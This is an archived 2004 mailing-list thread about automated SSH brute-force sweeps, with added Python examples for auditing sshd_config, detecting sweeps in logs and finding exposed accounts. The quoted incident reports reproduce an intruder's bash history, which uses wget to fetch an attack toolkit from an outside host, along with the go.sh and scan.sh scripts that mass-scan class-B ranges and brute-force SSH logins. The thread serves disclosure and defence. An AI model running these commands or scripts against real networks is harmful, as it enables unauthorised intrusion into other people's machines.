[SLL] Heads up: brute force ssh attacks
Paul
paul at oz.net
Thu Jul 29 18:22:34 EDT 2004
There have been a lot of brute-force login attempts
this week to sshd and a few other services (ftp), coming
from all over the world. Good time to make sure you are
up to date with your openssh patches and/or have ssh
allowed only from specific IPs. You did use good
passwords, no? :)
I'm enclosing the email that started the thread
and two others that shed light on the activity below.
-- Paul
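Added example (not part of Paul's note or the thread): a small audit of the sshd_config settings his advice points at. It reads a config the way sshd does (keywords are case-insensitive, the first value seen for a keyword wins) and reports the settings that let a password guesser in. The defaults table, the decision to stop at the first Match block, and both sample configs are assumptions constructed for the example; the PAM caveat on ChallengeResponseAuthentication is real sshd behaviour.

```python
import re

# Documented OpenSSH defaults for the keywords checked (assumption: matches
# the 3.x releases current in 2004; newer releases default Protocol to 2).
DEFAULTS = {
    "protocol": "2,1",
    "permitrootlogin": "yes",
    "passwordauthentication": "yes",
    "challengeresponseauthentication": "yes",
}


def parse_sshd_config(text):
    """Return {keyword: value} for the global section of an sshd_config.

    Keywords are case-insensitive and, as in sshd itself, the FIRST value
    seen for a keyword is the one that takes effect. Everything after the
    first 'Match' line is conditional and is not audited here (assumption).
    """
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        value = parts[1].strip() if len(parts) > 1 else ""
        effective.setdefault(key, value)
    return effective


def audit_sshd_config(text):
    """Return a list of findings; an empty list means nothing to fix."""
    cfg = parse_sshd_config(text)

    def setting(key):
        return cfg.get(key, DEFAULTS.get(key, "")).lower()

    findings = []
    if "1" in setting("protocol").split(","):
        findings.append("Protocol: SSH-1 still enabled; set 'Protocol 2'")
    if setting("permitrootlogin") != "no":
        findings.append("PermitRootLogin: root is a fixed target of the sweeps; set 'no'")
    if setting("passwordauthentication") != "no":
        findings.append("PasswordAuthentication: guessing only works against passwords; set 'no' and use keys")
    elif setting("challengeresponseauthentication") != "no":
        # With PAM in use, keyboard-interactive can still prompt for the
        # UNIX password even though PasswordAuthentication is off.
        findings.append("ChallengeResponseAuthentication: still 'yes'; set 'no' or PAM can accept passwords anyway")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("AllowUsers/AllowGroups: absent; any account with a shell can be tried")
    return findings


# Constructed sample configs (not from the thread).
WEAK_CONFIG = """\
# a Woody-era sshd_config with the defaults left alone
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
AllowUsers paul@192.0.2.10 ops
# sshd keeps the first value it saw, so this later line is ignored:
PermitRootLogin yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["ok"])
```

The AllowUsers form `user@host` is what "ssh allowed only from specific IPs" looks like inside sshd itself; a packet filter on port 22 does the same job one layer down, and doing both is cheap.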
-----------------------------------------------------------
Date: Thu, 22 Jul 2004 10:47:46 -0400 (EDT)
From: Jay Libove <libove at felines.org>
To: full-disclosure at lists.netsys.com, vulnwatch at vulnwatch.org
Subject: [Full-Disclosure] Automated SSH login attempts?
[ Posted to full disclosure and vulnwatch; please edit reply address(es)
as appropriate. Thanks. -Jay ]
My Linux system, and a Linux system run by a friend here in the same city
but on a completely different netblock (different ISP), have both seen
apparently automated attempts to log in to our systems via SSH in the past
few days. Looks like a script.
Here are some log entries from my system:
Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 62.67.45.4
Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test from 62.67.45.4 port 39141 ssh2
Jul 15 10:01:36 panther6 sshd[8269]: Illegal user guest from 62.67.45.4
Jul 15 10:01:36 panther6 sshd[8269]: Failed password for illegal user guest from 62.67.45.4 port 39192 ssh2
Jul 15 10:01:37 panther6 sshd[8271]: Illegal user admin from 62.67.45.4
Jul 15 10:01:37 panther6 sshd[8271]: Failed password for illegal user admin from 62.67.45.4 port 39234 ssh2
Jul 15 10:01:38 panther6 sshd[8273]: Illegal user user from 62.67.45.4
Jul 15 10:01:38 panther6 sshd[8273]: Failed password for illegal user user from 62.67.45.4 port 39275 ssh2
Jul 15 10:01:39 panther6 sshd[8275]: Failed password for root from 62.67.45.4 port 39340 ssh2
Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root from 62.67.45.4 port 39386 ssh2
[stuff deleted]
.. and some log entries from my friend's system:
Jul 19 21:04:33 quack sshd[28379]: Illegal user test from 131.234.157.10
Jul 19 21:04:34 quack sshd[28381]: Illegal user guest from 131.234.157.10
Jul 19 21:04:36 quack sshd[28383]: Illegal user admin from 131.234.157.10
Jul 19 21:04:37 quack sshd[28385]: Illegal user admin from 131.234.157.10
Jul 19 21:04:38 quack sshd[28387]: Illegal user user from 131.234.157.10
Jul 19 21:04:43 quack sshd[28400]: Illegal user test from 131.234.157.10
Jul 22 09:39:10 quack sshd[7646]: Illegal user test from 156.17.99.11
Jul 22 09:39:11 quack sshd[7648]: Illegal user guest from 156.17.99.11
I have not seen any notes about this on the vulnerability discussion
lists. Has anyone else noticed it? What specific vulnerability (or
default password?) is this looking for?
-Jay Libove, CISSP
libove at felines.org
Atlanta, GA US
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
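Added example (not part of Jay's post): the pattern in his excerpt, one source walking a short username list within seconds, as detection logic over sshd log lines of the same shape. The regex, the window and threshold values, and the sample log (RFC 5737 addresses, constructed for the example) are all assumptions; the only page-derived input is the line format.

```python
import re
from collections import defaultdict
from datetime import datetime

# One regex for the two line shapes in the excerpt above:
#   "Illegal user test from 62.67.45.4"
#   "Failed password for [illegal user] root from 62.67.45.4 port 39340 ssh2"
SSHD_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Illegal user (?P<u1>\S+) from (?P<ip1>\S+)$"
    r"|Failed password for (?:illegal user )?(?P<u2>\S+) from (?P<ip2>\S+) port \d+)"
)


def parse_sshd_line(line, year):
    """Return (timestamp, source_ip, username) or None for other lines.

    syslog timestamps carry no year, so the caller supplies it (assumption:
    the file does not span a year boundary).
    """
    m = SSHD_LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip1"] or m["ip2"], m["u1"] or m["u2"]


def find_user_sweeps(lines, year=2004, min_users=2, window_seconds=60):
    """Report source IPs that tried >= min_users distinct usernames within
    window_seconds. min_users defaults to 2 because the tool discussed in
    this thread tries only 'test' and then 'guest'; raise it on noisy hosts."""
    by_ip = defaultdict(list)
    for line in lines:
        parsed = parse_sshd_line(line, year)
        if parsed:
            ts, ip, user = parsed
            by_ip[ip].append((ts, user))

    hits = []
    for ip, events in by_ip.items():
        events.sort()
        # slide a window over the time-ordered events for this source
        for i, (start, _) in enumerate(events):
            users = set()
            for ts, user in events[i:]:
                if (ts - start).total_seconds() > window_seconds:
                    break
                users.add(user)
            if len(users) >= min_users:
                hits.append({"ip": ip, "users": sorted(users),
                             "lines": len(events), "first_seen": events[0][0]})
                break
    return sorted(hits, key=lambda h: h["ip"])


# Constructed sample log (same format as the excerpt, addresses from RFC 5737).
SAMPLE_LOG = """\
Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 192.0.2.10
Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test from 192.0.2.10 port 39141 ssh2
Jul 15 10:01:36 panther6 sshd[8269]: Illegal user guest from 192.0.2.10
Jul 15 10:01:36 panther6 sshd[8269]: Failed password for illegal user guest from 192.0.2.10 port 39192 ssh2
Jul 15 10:01:37 panther6 sshd[8271]: Illegal user admin from 192.0.2.10
Jul 15 10:01:37 panther6 sshd[8271]: Failed password for illegal user admin from 192.0.2.10 port 39234 ssh2
Jul 15 10:01:38 panther6 sshd[8273]: Illegal user user from 192.0.2.10
Jul 15 10:01:38 panther6 sshd[8273]: Failed password for illegal user user from 192.0.2.10 port 39275 ssh2
Jul 15 10:01:39 panther6 sshd[8275]: Failed password for root from 192.0.2.10 port 39340 ssh2
Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root from 192.0.2.10 port 39386 ssh2
Jul 15 10:03:02 panther6 sshd[8290]: Failed password for paul from 198.51.100.7 port 4022 ssh2
Jul 15 10:03:09 panther6 sshd[8290]: Accepted publickey for paul from 198.51.100.7 port 4022 ssh2
""".splitlines()

if __name__ == "__main__":
    for hit in find_user_sweeps(SAMPLE_LOG):
        print(hit["ip"], hit["users"], hit["lines"], "lines since", hit["first_seen"])
```

The "Illegal user" line alone is already a strong signal (the account does not exist), so a one-off mistyped username from a known admin host is the main false positive to expect; the legitimate single failure from 198.51.100.7 in the sample is not reported.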
Date: Thu, 29 Jul 2004 18:38:15 +0200
From: Stefan Janecek <stefan.janecek at jku.at>
To: full-disclosure at lists.netsys.com
Subject: [Full-Disclosure] Re: Automated SSH login attempts?
Hmmm - I have also been getting those login attempts, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:
Whoever broke into the machine did not make any attempt to cover up his
tracks - this is what I found in /root/.bash_history:
------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
------
um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:
go.sh:
-------
./ss 22 -b $1 -i eth0 -s 6             # scan the /16 given as $1 for port 22 via eth0
cat bios.txt |sort | uniq > uniq.txt   # dedupe the hosts the scanner wrote to bios.txt
./sshf                                 # try the built-in logins against every host in uniq.txt
-------
* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).
This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?
The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.
cheers,
Stefan
Date: Thu, 29 Jul 2004 08:05:45 +0200
From: Jerome <jethro at docisland.org>
To: full-disclosure at lists.netsys.com
Subject: [Full-Disclosure] about the automated ssh login attempts
Hi list,
setting up a honeypot, I was able to identify some of the activity
associated with these login attempts.
after the honeypot's been probed for guest and test login, I had someone
log in as test and fetch some tools from websites to use them on the
honeypot.
tools were fetched from some .ro website as per .bash_history and
captured keystrokes.
the toolkit I had the opportunity to have downloaded by the kid on the
honeypot was made of a bunch of components:
- ss : a copy of the "very fast" syn scanner by haitateam published
lately, at least on packetstorm
- haita: apparently the tool used to bruteforce accounts
strings -a haita | grep SSH
SSH login bruteforcer by HaitaTeam
*tho* guest and test accounts seem hardcoded, so unless they fix
that, it's not gonna be a big threat for all of the other joes
accounts around.
and the final part:
- scan.sh: which is the kiddie's best friend for using these 2 tools
altogether:
#!/bin/sh
if [ $# != 1 ]
then
echo "Se da asa:"                  # "Usage:"
echo "$0 <clasa b>"                # "$0 <class B>"
echo "Exemplu:"                    # "Example:"
echo "$0 212.93"
echo "Daca nu prindeti ... verificati in fisieru \
asta sa fie pusa placa de retea care trebe adika \
eth0, eth1, ppp0 etc "
# Last message: "If you don't catch anything ... check that the right
# network interface is set in this file, i.e. eth0, eth1, ppp0 etc."
exit
fi
rm -f bios.txt vuln.txt uniq.txt   # clear the previous run's output files
./ss 22 -b $1 -i eth0 -s 6         # SYN-scan the /16 for port 22 via eth0
cat bios.txt |sort | uniq > uniq.txt   # dedupe scanner output into the target list
./haita                            # brute-force test/guest against every host in uniq.txt
I also had some other toolkits on the honeypot after the breakin, most
of them being local root exploits packed in a single archive, and some
massrooter for years old remote vulnerabilities, but we all know them.
I can provide with the bins if anyone's interested, but didn't bother
yet to place them on some website, feel free to email.
cheers,
--
Jerome
[pgp keyid : 33D7802F http://pgp.mit.edu]
[key fingerprint : 82E6 C9C8 05D1 BEAC 9353 8ECB CEAF 6A0A 33D7 802F]
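Added example (not part of Jerome's or Stefan's posts): since the tool only knows a fixed set of account names, the host-side question is whether any of those accounts exist with a shell and a usable password. This checks passwd/shadow-style contents for exactly that. The target list is taken from the log excerpts and Jerome's note but is an assumption (extend it from your own logs); the shell list and both sample files are constructed for the example.

```python
# Accounts the tools in this thread try, plus root (assumption: the list is
# taken from the log excerpts and Jerome's note; extend it from your own logs).
TARGET_USERS = ("test", "guest", "admin", "user", "root")
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}


def parse_colon_db(text):
    """Map the first field (account name) to the full field list, for
    /etc/passwd- and /etc/shadow-style files."""
    db = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.rstrip("\n").split(":")
            db[fields[0]] = fields
    return db


def account_status(name, passwd, shadow):
    """Classify one account: 'absent', 'nologin shell', 'locked',
    'empty password' or 'password login possible'."""
    if name not in passwd:
        return "absent"
    shell = passwd[name][6] if len(passwd[name]) > 6 else ""
    if shell in NOLOGIN_SHELLS:
        return "nologin shell"
    # shadow field 2 is the hash; a '!' or '*' prefix means the account is
    # locked for password login, an empty field means no password at all
    pw_hash = shadow.get(name, [name, "*"])[1]
    if pw_hash == "":
        return "empty password"
    if pw_hash[0] in "!*":
        return "locked"
    return "password login possible"


def exposed_accounts(passwd_text, shadow_text, targets=TARGET_USERS):
    """Return [(name, status)] for target accounts a password guesser could
    actually get into, i.e. everything except absent/locked/nologin."""
    passwd = parse_colon_db(passwd_text)
    shadow = parse_colon_db(shadow_text)
    report = []
    for name in targets:
        status = account_status(name, passwd, shadow)
        if status in ("empty password", "password login possible"):
            report.append((name, status))
    return report


# Constructed sample files (not from a real host; hashes are placeholders).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
test:x:1001:1001:test account:/home/test:/bin/bash
guest:x:1002:1002:guest:/home/guest:/bin/sh
admin:x:1003:1003:admin:/home/admin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
"""

SHADOW = """\
root:$1$saltsalt$0123456789abcdefghijkl:12600:0:99999:7:::
test:$1$saltsalt$abcdefghijkl0123456789:12600:0:99999:7:::
guest:!$1$saltsalt$zyxwvutsrqponmlkjihgfe:12600:0:99999:7:::
admin:*:12600:0:99999:7:::
nobody:*:12600:0:99999:7:::
"""

if __name__ == "__main__":
    for name, status in exposed_accounts(PASSWD, SHADOW):
        print(f"{name}: {status}")
```

On the sample, guest is locked and admin has no shell, so only test and root come back; root is better handled in sshd_config (PermitRootLogin no), and a stray "test" account with a password is exactly what Jerome watched the intruder walk in through. An empty hash is still reported even though sshd refuses it by default (PermitEmptyPasswords no), because other services on the same box may not.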